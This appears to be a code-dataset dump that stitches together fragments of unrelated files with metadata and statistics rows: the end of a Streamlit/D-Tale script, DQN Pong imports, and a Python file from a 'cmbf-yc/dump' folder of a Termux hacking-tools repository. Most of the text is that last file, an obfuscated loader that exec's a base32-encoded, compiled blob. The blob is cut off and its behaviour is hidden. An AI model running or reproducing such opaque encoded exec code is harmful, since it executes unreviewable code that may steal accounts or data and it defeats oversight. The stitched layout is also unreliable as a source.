df=pd.read_csv(r'dataset/indian_liver.csv')
startup(data_id="1", data=df)
st.markdown("""<iframe width="840" height="540" src="/dtale/main/1" />""",unsafe_allow_html=True)''')
| 64.534884
| 231
| 0.765045
| 354
| 2,775
| 5.946328
| 0.299435
| 0.038005
| 0.045606
| 0.059857
| 0.861283
| 0.861283
| 0.861283
| 0.861283
| 0.861283
| 0.835154
| 0
| 0.051161
| 0.084324
| 2,775
| 43
| 232
| 64.534884
| 0.777253
| 0
| 0
| 0.282051
| 0
| 0.179487
| 0.79755
| 0.122478
| 0
| 0
| 0
| 0
| 0
| 1
| 0.025641
| false
| 0
| 0.128205
| 0
| 0.153846
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 1
| 1
| 1
| 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
0
| 7
|
22b1c9f6bd389e04d4cb87e2552b5d0ed3cbd3cb
| 123
|
py
|
Python
|
Chapter11_DeepQNetworksAtari/2_DQN/pongDqnWrappers.py
|
franneck94/UdemyAI
|
bb3decc35ec626a09edf0abdbfbe7c36dac6179a
|
[
"MIT"
] | 2
|
2021-02-10T19:50:27.000Z
|
2021-12-30T06:15:55.000Z
|
Chapter11_DeepQNetworksAtari/2_DQN/pongDqnWrappers.py
|
franneck94/UdemyAI
|
bb3decc35ec626a09edf0abdbfbe7c36dac6179a
|
[
"MIT"
] | 1
|
2020-12-21T15:29:20.000Z
|
2022-01-15T12:06:09.000Z
|
Chapter11_DeepQNetworksAtari/1_Start/pongDqnWrappers.py
|
franneck94/UdemyAI
|
bb3decc35ec626a09edf0abdbfbe7c36dac6179a
|
[
"MIT"
] | 4
|
2020-11-08T17:07:53.000Z
|
2022-02-07T06:40:55.000Z
|
import collections
from typing import Any
from typing import Deque
from typing import Tuple
import gym
import numpy as np
| 15.375
| 24
| 0.829268
| 20
| 123
| 5.1
| 0.55
| 0.294118
| 0.470588
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0.170732
| 123
| 7
| 25
| 17.571429
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| true
| 0
| 1
| 0
| 1
| 0
| 1
| 0
| 0
| null | 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 1
| 0
| 1
| 0
|
0
| 7
|
22bfa5f535b8114af00f54daed184ac9e5fb0b52
| 27,756
|
py
|
Python
|
cmbf-yc/dump/asw.py
|
Zusyaku/Termux-And-Lali-Linux-V2
|
b1a1b0841d22d4bf2cc7932b72716d55f070871e
|
[
"Apache-2.0"
] | 2
|
2021-11-17T03:35:03.000Z
|
2021-12-08T06:00:31.000Z
|
cmbf-yc/dump/asw.py
|
Zusyaku/Termux-And-Lali-Linux-V2
|
b1a1b0841d22d4bf2cc7932b72716d55f070871e
|
[
"Apache-2.0"
] | null | null | null |
cmbf-yc/dump/asw.py
|
Zusyaku/Termux-And-Lali-Linux-V2
|
b1a1b0841d22d4bf2cc7932b72716d55f070871e
|
[
"Apache-2.0"
] | 2
|
2021-11-05T18:07:48.000Z
|
2022-02-24T21:25:07.000Z
|
# ECRYPT BY Boy HamzaH
# Subscribe Cok Chanel YouTube Gua Anjing
# Dan Jangan Lupa Follow Github Gua
exec((lambda _____, ______ : ______(eval((lambda ____,__,_ : ____.join([_(___) for ___ in __]))('',[95, 95, 105, 109, 112, 111, 114, 116, 95, 95, 40, 34, 98, 97, 115, 101, 54, 52, 34, 41, 46, 98, 51, 50, 100, 101, 99, 111, 100, 101],chr))(_____),"<haMzah>","exec"))(b'EMQEKQ2SLFIFIICCLEQEE33ZEBEGC3L2MFEAUIZAKN2WE43DOJUWEZJAINXWWICDNBQW4ZLMEBMW65KUOVRGKICHOVQSAQLONJUW4ZYKEMQEIYLOEBFGC3THMFXCATDVOBQSARTPNRWG65ZAI5UXI2DVMIQEO5LBBJSXQZLDFAUGYYLNMJSGCIC7L5PV6XZMEBPV6X27L5PSAORAL5PV6X27L4UGK5TBNQUCQ3DBNVRGIYJAL5PV6XZML5PSYXZAHIQF6X27L4XGU33JNYUFWXZIL5PV6KJAMZXXEIC7L5PSA2LOEBPV6XJJFEUCOJZMLM4TKLBAHE2SYIBRGA2SYIBRGA4SYIBRGEZCYIBRGEYSYIBRGE2CYIBRGE3CYIBZGUWCAOJVFQQDIMBMEAZTILBAHE4CYIBZG4WCAMJRGUWCAMJQGEWCANJUFQQDKMRMEAZTILBAGQYSYIBUGYWCAOJYFQQDKMJMEA2TALBAGEYDALBAGEYDCLBAHE4SYIBRGEYSYIBRGAYCYIBRGAYV2LDDNBZCSKJIL5PV6X27FEWCEPDIMFGXUYLIHYRCYITFPBSWGIRJFEUGEJ2FJVIUKS2RGJJUYRSJIZEUSQ2DJRCVCRKFGMZVURKCIVDUGM2MGJGUMRKBKVEVUQKLJYZFORJUGNCE6SSVK5CVUSSBJFHFQV2XJFBUITSCKFLTIWSMJVCUETKXGY2UWVKPKZJEOS2JINEE6VSRKNAVCTCPJZFFKVZULJMUWRKNKFCUSWKMJ5CUERSHIMZVISCNIZMEGQKUIRLE6QSRKNAVEVCQJZJFORZWGVNECSJVKVMESMSEKZGUSUKFJ42UYQSCJJJVQUK2JRCEMQKVI5MVSTCOJVFFGR2DJFBTOTBVKBLDMWC2JVCUEUCWGZMDEN2MGVIFGQKPKJAUYNKQKY3FQMRXJQ2FKR2LGVKEETSRKVBVCM2EIJHFMUSHJFMUUQKMGVIFMNSYLJGUYNKQKNMVQWSBJBEVCRRWLAZDOTBULBDVKMZTJJHFSVKGK5MFUSKMGVIFMNSLJJAU2WSYLBCUSQZXJQ2VAU2BGJGE6RKCKBLDMWCKJJDEKVKDJ5FFUTKMJU2FIS2MIJAUQRJSKNMUSQSSI5ATEU2ZJFBFER2BGRJVSSKCKJDUKWSDLFEUEUSHIVMVGWKJIJJEORJSINMUSQSSI5CTGQ2ZJFBFUR2VK5BUCT2KKZDFCUKEJFGUETKFIFNFISKMIJAUQRJUINMUSQS2I42FOQ2BJVFFER2VK5BUCTKKKFDUKV2DIFHEUVKGKFIUIS2NKJGUKQK2KREUYQSBI5IVSU2ZJFBFKR2ZK5BUCT2KLFDFCUKEJNGUUTKFIEZFIQKMIJAUORKZIRAUYQSBI5CVSRCDJRBECSCFGRJVSSKCKJDUKWKTLFEUEUSHIFMUGWKJIJJEOQKZKYZEYRCEJZBFUQ2TJNFESTBVKBLDMWBSG5DEKV2DIVIEISKNIZDVQVKZJREUQWKSINMUSVCGKBBFGV2HJFJEURSFKVDUKSRSIZFFMSKVJNJTEUSHJJFFKWKSKNFESWSFKVJVCMSEJJJEGVSDKJFUMR2NLJLFKUSLINEVMRCVI5GTETKHJJDVKTKSJNBEWVSFKZKVCS2MJJMVURSPKJFFKR2OINCTMU2TKZFTKQ2WKVJVGQSKIZEEMUKWGJMEURSCKVEVIU2DJNDEYVCJK5JU2SSWINKUKVCLLBDVSMSVK5LEWUCLLJFEKT2TGJFESTSFIU3FMU2SJNHECVSDKRBVASS2IZDEWVS2KVGEUTKVK5JEWTSLIZBVKU2XJNGUUNKDKVCVEU2IJFGVUVSJKNBU4SK2JVCUOUKLKVEVETCFGZIVGUSLJZAVMRKWINIUUWSKIZHVEWSXI5LE4RKDKNFFMS2WJVCVGTKTIVFVUR2VKNKUWRSKGQZFKWKRKNBUUSSKKZIVKSZSJJJEGRKNKFFVMSJVJVLFGVCDJ5FFMRSGI5JDERCKIZBFIT2UIJLEWQSMIRGVOQZSJJLEGVKFKVBVOR22JVCEKTRSJVDVMSKGI5IUWUCLJJAVKWKOJNIUWWJTIZIU2USYJJITERSLKIZEYR2WJNCUKVCTKJFVMQSWINGTERKJJJEEMTKVKNEEURSNKVKVCS2NI5LESRSNJZJVSTCKI5KVSTSLKFFU4TKWKFLVGQSKIJCVMQ2SKJLUYQK2IRHVIQSVJRBEIVSLJVNFISSKJBDFGVSLI5FTKTKGKVJUWTKHKZEUMTKOKNGEUSSBKUZFOU2ZJRBEGVKTKFNFQSSRGJLECVJSIJDUUR2FGZJEWQ2LIJGEITKXINFUUSSEIVFVMS2EJI2UMRSVKRFU2SSVGJDESUZSJVEUUQKVKFJEUU2LJZGVKU2RKNJUSNKBKRCVKMS2JJDEERSFKIZEER2SJJLFGU2LINFUURCVJNLVGRCMIZCVKRKVKNEESVSNKZDVOS2KJFFEURKPKJFFGSKOJVKVGUKTKNETKQ2UI5ITEWSKIZBEMVKSGJLEWNKCKVBVIMSLJNNEIRSDKVFUKSSGI5KUKVCLIZEUMTSGJFJUWTKJJJAVKUKSJJKUSTSNKVJVCUZSJE2DERSPKEZEESSWIZDEKURSKZFTKQSVINKEWS2LIZCFKS2WGJCESRSIIVKVMS2HJNDESVKJKMZE4S2KI5KUWUKLGJFVERKVLFIVGQSJGVEVMU2VGJNEURSCIZFVEMS2JM2UEVKDKQZEWTCGIRDEGVKLIVFE4R2VKVKEWRSJIVNEMSKRJNGUSSSBKVHVES22JFJECVKZKFJUESJVINLFGUSDIRFFEQSFINJUGRSHKJFFMU2TJNBUWSSEKVFVOS2UJRDEKVKFKVJUQSKGJVKUOV2LJJEUUSSFJ5IUWWSLLFNEKWKSINCUUWSCIZKVCMSUJJHEMRKTKRBFMS2CJRCE2V2CKNDTKRCFJNLDERCJKZEUKSKTJNHESWSEKZIVMS22JJJEKVKRK5FVGSKOJVKVGVSDI5FUEQSGI5LDESCKIZFEKVKSKNDEWVSEKVFVGUSTJFNEMRSNKNFVMSSOJJKEKVKTJBFEURSGJNLUWU2LJZDEKU2XKNDEWVSKKZBU2U2FJJFEURKHKZJUIS2KIZKU2URSJZGEUTCGJNKVGTCJJZCVMTKSINLESNKHKRCVIS2IJJFEIVSLKRFVGSSOIJCVOVSTIZFVUS2WINJTETKKJJGVMVKSKNIEWSSGIZFVEMSPJFHEGVCNKUZFIS22IZKEWUJSK5FVMSSWI5IVGS2JLJCUKTKVJNLUOSSNIVKVEU2DJNLEKVSJKUZEISSOIRCVSVSDJJFTKSSVGJJVGV2JJZFVKS2WINGEYQSEKZJU2U2WJM2UYRKXKVBUYTCKIZCUWVBSKRDUURSFKNKFGRSJKUZUMTKVGJJUUTSIIVBVMU2EJNJEEVSBKNJTESK2IRCVOVSTGJFVMR2FKVKEWVSLGVFEKV2UKNGESWSCKZFVKMSYJJHEOVKVJZFUIS2WINLEKVJSJFFEMR2WKVLFGSSLJZBFKNCTJMZEUVSDKVHVKS2MJNLEKVSFKRBUMR22JFLEOVKTJRFFUQKWJVJEWV2JJZEVKVKXKNFUSWSIKZCVOU2YJE2UYRJUKJFUIS2OIZDE2UZSK5FFMQ2WI5KEWVCJKZDFMVKSGJLEWTSLKVLVEU2LI5IVURSLK5FVES2OIJKVKU2TJNFVUSKWJNJVUU2KJJFEKR2SJNHEWRSGKZGVGSSWJJLEYRSHKZBUISRVIZDE2USTI5ETKSSEIVJEGS2JLJBEMSKUGJKUSSSMIVLVCU2NJFJEOVSPKFNFGSSKJRCUOVSLIZFVMQSWJ5JDEMSKKZBUKS2UKJJUUVSEKZGVGS2HJE2USVKXKVBUYSSKIFLEWV2LJ5FE4SKVK5LUUVCJLJEVKMSVKNMUUSSJKRCVEU2MJNEVURKZKIZFOSSOINKUWVSDKRFUURSWJVIVGV2JJZDVIRKSJNFEUSSFIVGVIS2WJNHEKRKVKJJU4S2WJNLEGUZSJZETKTCFKNJFGTSKLJFFMU2UINFUSNKLKZJVIU2MJNDEMVJUKRFVOS2GJRLEOUKTJNEUUQ2WJVITEU2LJJGFKWKRJMZESUSIKZEVCU2WJJJEERKJKZJUYSSWJZDESU2TJNFEERCGI5LFGTCJGVDFIS2UJNDUWVSKKVLVIS2IJNNEKVKNKRFU6S2OI5CVKU2TIJFVKWSGJ5KTEWSKKJBEKR2WJNKEWRSOIZIVGU2SI5FEYRKDKZFFGSKKIRKVKURSIZDVUSSFK5ITETCJJJDUKSKUJNMESTSGKVKVGU2FJFLEMVSNKMZEKSSJGJKU2USTKZFVERSVGJJVGVSHJJCEKU2VLJJUUVSFKVKVCS2WJNDEURKVKUZEYSS2I5LEWVJSKJFU4SSVKNHEWQSLKJBVMS2NKMZEUSSEIVCVEU2GJNEVURKFKIZFGSSKJRDEOVJSJREU4RSVKVJEGVSKJZGFMR2SINGUSWSDKZFVES2WJNHEKRKTKZJU4S22IRLE6UZSJNFEMRSFKVJEWUCLJJDEMR2TJNHUUVSLKZDVKS2UJNHEKVCLKEZFKSJVJFKEKV2TJNEVUQSFJVLEWU2HJJGEKV2OJNBUWVSCKZEU2U2MJJHE4RKJKJJUIS2WIZKUWU2TI5ETKS2VJNLEGTCJLJCVKTKUKNDUURSKKVLVIS2KJJFECVSLKVFVGSSKJNKVGVCTJZFVMSSWINKVUU2KIUZEIRKSKNIEWRK2IVCVGU2XJFNEIRKLKVJFGS22IZKEWUKTKZEU4S2FK5JTETCJLJBUMS2TGJLUOSSDIVJVEU2JJFLEWVSNKMZEQSSOIRCVGVSLJJFU2WSFGRJTES2JGVFVKV2VJNGEOSSGKZCVES2WJRDESVSHKFJUUR2WIVLE2VJSKZDUUTSFKVJFGQ2JLJDFMRKNKMZEUTJSKVCVMS2EJNIVURKXKRBUOSKSIRCUOVSLJREVMRSFGRJDEVSLKZFUKV2SKNFESVSOIVGVGS2SJJHEOVKTKNJUES2WJBLEKUZSGJFEMSSFINLEWWSLIZFFKRKTJJLESTSMIZDVKU2EJFJEMRSFKFJUMSKOJJKUOUSTJBFUURSGJVKTEVCKJZBFKV2TKNCUWVSGKZHVGMSVJJJEIRKLKZFUMS2WJJKVCU2LI5FFMS2VJ5LDETCKJJCVKVKTKNDEUNKJKVLVOU2MJRDE4RKLK5FVGSKOINKVKV2TINEVUS2WINGVGVKKJJEEKTKSJNKEWUSCIZGVGMSDJJJEGRJSKYZEGS2OIRKEWUSDIZFE4TCEIVJEGSSLLJCVKS2TJNKEUTSIIVJVOU2FJNNESVSNKMZDESSKJJCUWVSLKJFTKRSWI5JUWT2KKZFVMR2WKNCESNKGKVCVCU2HJE2UYRCFKNBUWSK2IZCUWVSLKNFU4RCFK5LFGRKLKZDFMR2VKNKEURSOIVGVEU2OJNHEMVSNKNJU6SSKJNCUWVSLKRFEERSFKVJFGR2KJZGFKV2VGJGEUWSEIVFVKMSYJNHEIRKXKZJUWS22IJKTEVJSIZFEURSFKVJEWSCLLJFFKSKTGJFUSWSLKUZFKUSTJJNEORKVKRBUOSSOJNLEOVCDJJFFUQ2WJVKEWU2JJZGEKU2OJNEEWUSDKZEVGMSJJJFEMRKJKZJUYS2SIZLEOU2TJ5EUUQ2WJ5LFGVCJLJDFMVKTGJLUSTSKKRCVIS2LJJFEOVSNKZFVGS2OJFCVOU2TI5EVURSWIVGVGUCKIZEEKR2WINHEWVK2IZEVGMRSJFNEWRKXKVFFGSZVIZLE2U2TK5ETKSKWI5JTESSMJJBVKS2UJNLEUTSMKVHVGU2OJFLEWVSFKUZEISSOJRCUWVSTJJFVKWSFJFJVGT2JKJBVMU2WKNCEUSSGKRFVGU2WI5FEUVSHKYZEUSS2IZLEWUZSK5EU4R2FLFIVGRKLLJFFKMSVGJLUUTJSKVMVES2YJNLEEVKZKRBUWSK2INKVOVSCKNFVERCVKVJFGRSLJZFUMR2SKNFEWVK2KVGVIS2WI5FEUVKVKRJUSSKWIJLE2VJSIVFE4SSFIVLFGQSLJZFFIRKTJMZESUSDKZHVMU2UI5FEMVSNKIZEMS2WJNCVOVSTJRDVMRSFJNLDEVKLJZDUKU2XKNBUWWSGKZFU2U2ZJJFEQRKPKZFVMSS2IZKUSUZSK5EU4TCFJNLEUU2KIZDEKTKSGJLUWVSMIZDVGU2MJJNEERSLJZBVISSNLJCVKVSTIRFVMSCWJNJTETKKJZGEKS2WKNDEWUSCKVGVEMRSJJDEYRKPKZFVISSSIZDFKUKLK5FFMSSFK5LDESSKLJCVMS2WJNMEWTSGKVJVOU2JJNNEGVSPKUZFSSSFGJKVSUSKKVFUURSVJFJTET2JLJCEKMSVLJJUWNKGIZGVCMSXJE2UWRKXKZBUUS22IRDE2VSLKNDUUTCFK5KFGTCLKZGFMRKVGJGESNKJKZKVEU2MJM2UMVSFKMZE6SKKJNLEWVJSKRFE4RSWKVJUWV2KJZFFMVKVGJFUUSSGIVFVEMSTJJHEQRKXKJJUOS22I5LEOU2TK5FEUTCFLFJFGSCLLJBFKSKTKJLESWSEIUZFKU2UJE2UKVCLKNJUKSKWJJCUOUZSJJGEUQSFJVJUWVKHJJFVKU2TKNGUSVSMKZBVKMSOJJDEURKPKZJVAS2GJZDEOU2TJNFFEQ2VJ5LFGTCJLJDFMTKRKNLUUNKKIRCU2U2LJNNEEVKLKMZFKS2KJJKVKVSTIVFVUR2WI5JTESCKIUZFKU2WJNMEWVSCKVMVGU2LJFDEYRKXKYZEYSRVIZCTIU2LKZFTKTCVKVLEGSSMJJCVMS2NKNLEWTSNKVKVGU2KJNJEGVSFKUZE2SSOIVLFKUSLLJFUSWSGJ5JVGT2JJZFVKV2WKNCEWUSGKVKVEU2XJJLESVSHKYZEUSS2IRLESUSLKNFE4RSFKVJVGRSJKZDVMSKTGJLUUTSIIVFVES2WJNFEUVJUKMZFOSSOJRCUOVK2KNFFURKUJNKEGRSLJZFEMR2UKNFUYSSGIZGVKMSVJFHEMVKTJZFUYS22JJLESVJSJVFE4RCFJVLEUVKLKJDFMT2TGJDUUUSMIVHVKS2UJJHEKVKVKEZFOSSWJFKEKVJSJRFEUR2GJNLUWUSKJVNEKU2VKNEUWWSFKZBVKMSXJJFEURKFKJFUUS22JJKVSU2TK5FFURCFKNKTEVCKJZDEKRKSINDUSNKMIZDVIQ2KI5LEIRSJKMZFKSSOIRKVOVSTJNFVMTCWJFJTESKKJZHEKS2WJNHEWUSGKU3FGMSPJE2UGVSLKUZFISKKIZLEWV2TI5FDKS2UIVLVGS2LJJBEKS2SGJLUUTSLIVLVEU2PJFNESVSHKUZFGSJVIZCVSUSLIRFVURSGI5JUWS2JKJFVMS2VKJJUSWSEKZKVGU2GJM2USVCFKRBUUSSKIRKUWU2LKVFE4TKFKNKFGR2LKZFVMR2VGJDEURSMIVGVMU2OJNGVURKLKNJUUR2KJNKTEVKTKRFVURSWIVJFGVSHJJFFMR2WKNEEUSSDIVFVKMSWJRFEUVKVKZJUMS2WJNLEGUZSK5FE4RCFKVJEWVSLKVNEKWKTKMZESNKMIVLVMSSTJNFEMVJUKNJVMS2OJBCVOUKTJRFUUQSWJVJTETSLJVNEKVKTKNCUSVSDKZCVKMSHJJHEKVSVKJFUMS2JLJDEOU2TJNFFERCFJ5LEUU2KKJCVKNCSKNLEWVSKIVDVMU2LJJNEORSNKIZFGSKOI5KVGV2TIRFVURSWIVJTEV2KJZEEKS2SJNKEWWSKKU2FGMRSJFJEYRJWKVNFGSSOIZCU2USTIZFVMSSFK5KUGTCKJJCEKTKSGJKEUTSIKVKVMU2MJNNEIVSLKMZFKSSOJBCUWVSDJRFUKWSGJNJUUVSKIZFUKS2WGJKEUTSFKZKVCU2GJJLEYRKXKUZEQSSKI5CUWVRSJ5FE4QSVK5LFGQ2LLJCVKMSVGJGUUSSIIU2FES2KJNFEUVKJKMZFOSK2JNKVOVJSKRETKRKUJNJTEVSKJZGEKR2UINFEYSSDKZFVIS2VJNHEIVKVKJJUWS2WJRLESUZSJNFEURSFINLFGTCLKZDFMR2TKNFUUTSLKZDVMQ2UJJNEMVSNKNJVOSKOJNLFKVJSJNEVKWSFJFJEWU2LJZEUKV2SJMZESVSDKZDVKMSYJJDE4RKJKJFUYS2WJJDEOUZSGJEVUS2FK5KUWVCLLJCVKNCTGJDEWNKKKRCVIQ2KJRFEEVKNKMZFIR2KJRKU6U2TIREVMSSWIVKTESSKIZGEKV2WKNHEWTK2IVIVGU2PJFJEGVSHKZJUYSSKIZKTEV2TIZDVESSUIVJTESSHKZDFMS2WGJLEUTSHIVHVGU2HJNNEGVSFKMZFOSSSIRCVGVSTJBFUMSSVKVJDEV2JKZGEKMSWJJJUWWSEKVKVIU2GJNLEURSHKEZEUTCKIRDE2USLJZFU2WSFKVKEUU2LKZBVMTKTGJCUUTSJKZKVES2YJNJEEVKPKNFVGSKSINKU6VSTJRFFERKWJVJFGRSHKJFEIRKWKNGEWWSGKVFVMMSTJNHEMRKTKZJU6SKWI5LEOUZSKNFEUSCFJ5LEWVCLJZFFKRKTGJLUUQSMIVFVKWSTI5FEMRKNKNJUMSKOJRCVOV2TJREVURSGJNJEWVCKJJGEKU2UKNGUSWSEKZFVKMSFJJDEURKNKJJUMS2GJJKU2U2LJ5FEUS2VJ5KVGVCKIJDFKVKSKNDUUVSLKRCVMQ2LJJNEERSLKYZFIS2OINKVOVSTI5FVUSCWI5GVGVSKJJFEKSKSJNGEWWSGKVGVGMSXJJFEWVSDKUZEYSJVIZDE2UZSKZFDKTCEIVKEGS2KJJBVMS2WJNKEWTSEIVKU4S2KJNLEYVSPKUZE2SSSIRCTIUSLJRFTKRSWI5JUWT2JJZFVMS2WGJKESTSFKZKVGMSXJFHEOVSHKZFUWSSKIVCUWVCLKNFE4S2FK5KVGQ2JLJDVMR2NKNCEUSSKIVDVESSTJNMVURKHKMZE6SKSJNCVOVKTIREVURSFGRKEGRKJKZFEKR2TKNGEYSSDKZFVGMSUJJHEWRKVKRJUSSKWJJLE6VJSIZFE4TSFKNLFGTSLJVNEIRKTKNFUUSSDKVLVMU2MJNFEMVCLKJJVOSJVJJKVOVBSJNFVURSWJVJDEV2LJZBUKU2OJNDUWVSDKZBVKMSIJJCTEVKZKJBUMS2OIJKVOU2LGJEVUQ2VK5LFGTCLJZDFKNCSINDEWNKMIZDVES2MJNNEIRSNKIZFMS2OJNCVKUSTJ5EVMR2WIVKTET2KJZEEKTKWKNHEWTSKKU3FGU2LJJHEGVKXKZJUYS2SIZCUKUSTIZFVMSSGI5JDES2KLJDUMS2WGJLEOSSHIVKVOU2FJFLEMVSLJVJVSSSOJBCUSUSLLBFVUSSVK5JTEMSJJJFVIRKWJJJUSWSGIVKVEU2GJNLEURKXKNBUYTCKIZDEWU2LKRDUURSVKNLVGTCLKVNEMS2VKNKEUSSOIVHVES2WJNJEEVKPKNJU6SSOJRCU6VSDIRFEURSGKVITEV2KKZFUKV2VGJFEUWSHIVFVKMSPJJHEKRKXKVJUIS22IVLEOTKTJJFEURSFJVJEWSSLLJFFKWKTGJJUSWSMIVHVKMSUJI2UKVKVKEZFOSRVJRDEOVSDJJGEURCGJVLEWVCHJJGFKU2UKNFUWUSDKZEVGMSMJJFEMRKPKZJU4S22IZLEOUZSJ5FEMQ2WJ5KTEVCJGVCVMVKSKNLUSVSHKZDVKQ2LJFNEKRKLKIZFOSKOJBCVOVSLGJEVURKWI5GVEU2KIZHEKV2SJNMEWVSGIZDVGWSWJFNEYRJSKUZFISZVIVKEWU2LK5ETKSSUIVJVGTKKJJBFMS2TGJKUUTSMIVKVIU2NJNLEQVSHKUZE6SSGJRCVOVSTIZFVKWSFJFJVGT2KKJBVKV2WKNKEUSSGKZFVOU2GJJDEUVSHKQZEUS2KIJLE2VJSK5FU4Q2FKVJVGR2LKJDFMR2VGJLUSNKGIVKVMU2IJNMVURKVKNJTESK2JRCVOVK2KNFTKRKVGRJDERSMIZEVMR2SJNGEYSSGIZFU2U2WI5FEYVKVKRFFGS2WJVLEKUZSLFFE4TCFIVLEWWSLKJBFKV2TJMZESTSLKZHVMU2DJNHEMVSFKJBVMS2WJJDEOUSTJRFFURSVJVJDEU2LJZDEKV2WJMZEWVSHKZEVGMSXJE2UMRKVKZFVMS2SJJKVGU2LK5EUUTCFGJLEUU2JKZDEKNCTKNDESVSMIZDVCU2MJJNEMRSJKJFVISSNLJCVGVKTIRFVUSCWJVKTEVKJGVDEKTKWKNHEWSK2IVGVGMSXJJHEGVSPKZJVISSSIRLE2USTIZFE4TCEIVLEWTCKLJCFKS2VGJMEWTSCKVLVOU2HJNNEMVJSKUZFUSSKIZCVCUSLKBFVURSWJVJVGMSJLJFVKU2VLJJUWNKFKU2FIQ2GJJHEYRKVKUZEWSK2IRCUWVCLKNDUUTCVK5LFGTKJLJCFMR2VGJGUUSSOIVCVEU2MJJNEEVSJKNJU4TCKINLEWVSTKREVERSWJVJUGV2KJZFFIRKUJNFUUWSHIVFVGMSXJNHEIRKXKVJUGS2WI5LEKTKSKNFEURCFLFJEWUCLLJDFMSKTKNJUSWSEIZFVKS2MJM2UMRSNKNJUMSZVJRCEKU2TJNGEUQ2WJVJTEV2KJZGUKV2UKNDUWVSKKZHVKMSKJJHE4RKHKZJVAS2VLJDFGU2TIZDUUS2WKNKVGS2LKZDFKVKSKNLEURSKKRCVIMSKJRFEGRKLJVJVMTCKJJKVOTSLI5EVUR2WINGVGWCKIUZFKV2SJNMEWWSCKVKVGMRSJFJEIRJSKZJUYS2OIRKVKVCDIZFTKS2GI5KEGTCLLJDUMTKSJNLEOSSHIVJU4S2KJNNEWVSFKUZE2SSNGJKU2VSTIZFU2WSFGZJUWS2KJZGEKV2WJJJUWUSGIU2FEU2XJNLEUVKXKYZEWSS2IZDE2VSLKZDUURSVKVJVGR2JKZDFMRKNKNKEUSSIIVIVES2YJNFEUVKPKMZDESJVJRCU6VJSKRFTKRSFKVKEGRSMIZFEMR2TINGEYSSCIZFVGS2UJNFEYRKTK5JUKSKVLJDEWVJSKVFEKMSVJNLEGTCLJZFFKS2TJNLUUSSDKVHVKWSTJJFEORKVKFJUMSSWJJKVOVSLJBFEURSWJNKTEVCLJZDVKU2WKNGUWWSCKZFU2U2PJJFEIRKVKJFVAS22JJLECUZSI5FFURCFJ5KTEVCKJZDEMRKRGJLEUNKMIZDVIQ2KJRFEIRSNKRFVES2OJRKVKTSLJNEVEQ2VGJKTETCKJZHEKRKWJNGEWTK2IZFVGMSLJJFEWVSLKZJVISKWIZLFKURSK5ETKSSUIVJUGS2JKVNEMS2VGJLUUTSNIVLVMU2DJNLE2VSHKUZEYSSGIRCVSUSLLBFVSWSFLFJVEVSJLJBVISKVGJGEWWSGKRFVIQ2WJNLEYRKHKNJU2SSKINLE2UZSJZFU4TCFK5KFGTSLKZFVMR2VGJFUUTSKIVDVMU2GJNKVURJSKNJU6SKWJRDEWVKTJRGEURSVKNLVGR2KGVFFMR2UGJFEUWSGKZFVMMSXJNHEGRKXKVJUOS2WJNLEKVJSLBFEUTCFKNLFGSCLLFNEKVKTKMZESUSMIVJVKU2MJNHEMRJUKJJUMS2WJJLEOUSTJJFVURCWJVJUWVCHJJGFKVKUKNEUSVSGKZCVGMSXJJHEMRKVKZFFKS2NLJDE6U2TJ5FFEQ2VJ5LEWMSLJZDEMVKSJNKUUTSLIVDVEU2MJJNEMRKNKIZFKS2OIZKVSU2TI5EVUR2WJNGVGVSKIZEEKTKWJNKEUWSGKVMVGMRSJJFEYRKTKZFFGSSWIZCTIUSDIZFFMTCFKVLEWTCLJJCEMTKUGJKEOSSEKVKVKU2NJFLEQVSLKMZFKSSKJBCUWVSLKZFUKWSGJ5JVGV2KIZFUKS2WJJJUUUSGIVKVEMSHJJHEYVKXKVJUWSSWJZCUWVJSKZFU4RKVK5LVGRSLLJBFMS2NKNMEUSSGIVKVES2GJNFEMVKVKMZDESSKJNLFGVJSKRFTKRSGKVJEGRSLJZFVIRKWINFUUWSEIVFVES2TJFHEIVKTJZFU2SK2IRLESUJSJNETKTCFJFJFGSSLJVNEMS2TKNHUSUSLKZHVMU2UJJHEMVSNKRBVOSSGJJKEKU2LJNFFUSCFJNJTEV2KJZEEKV2VKNDUWVJTIZDU2U2QJJCTEVKHKZJUYS2VLJDESU2LJNEVUTCFK5LDEVCJGVDEIS2TGJKUSVSMKZDVGMSMJJFEERKLKMZFGR2KJRKVKVCTJREVMTCWIVKTEUCKIZHEKU2WKNEEWVK2IZDVGSSWJFNEGVSTKVJUYSKSIZLFKUSTI5ETKSSVK5JTESSLJJDFMTKTGJLEWSSKKVJVOU2FJNNEWVSHKUZEOSSNGJKVGVSDIZFVEQSVKVJVGS2JKJFVKV2VGJGEWVSGIU2FIS2GJNHEWRSHKIZEYS22IZLE2URSKZDUURCFKVJFGTKJKZDVMTKVGJHUUTSHKZKVES2MJNHEUVKVKIZEWSSOJNKEKVSLKRFVERSWKVJFGV2JKZFEMR2WKNEEUSSGIZGVEMSXJNHEKRKVKNJUISKWIZLEWTKTK5FFERSFKVLEWVSLLJFFKTKTGJLUUTSMIVDVKWSTJM2UMRJUKJBUMS2WJJCVOVSTJRFVMTSFJNLUWVCLJVNEKU2OJNGUSVSMKZGVGU2UJJHEMRKNKZFFKS2OJJLE2UZSJ5FEEQ2WJ5KUWVCKKJDFKVKRKNLUUVSKKRCVIU2MJJLE4RKLKZFVIS2OINKVGVSTIRFVUQ2WJNGVGSCKJJEEKS2WKNLEWSSGKVGVGMSKJRFEIRKPKUZFISSOIZDEKUSDIZFDKTCFKVKTES2LJJBVMS2OINJUWTSMIVLVMU2LJFLEIVSNKUZEYSSKJZCU6USTJZFUSWSGI5JUWT2JGVFVMR2WGJKESUSGKZKVEU2XJFLEUVCFKYZEWSS2IVCUWUZSKNFE4S2FK5LVGS2LKUZEMR2NKJJUURSKIVMVESSXJNLE4RSHKNJU6SK2INKTEVKTKREVURSWJVJVGRSLGVFVKR2UINFUUSSDIVFVIS2TI5FEWRKVKRJUSS2WJNLE2VJSJVFE4TS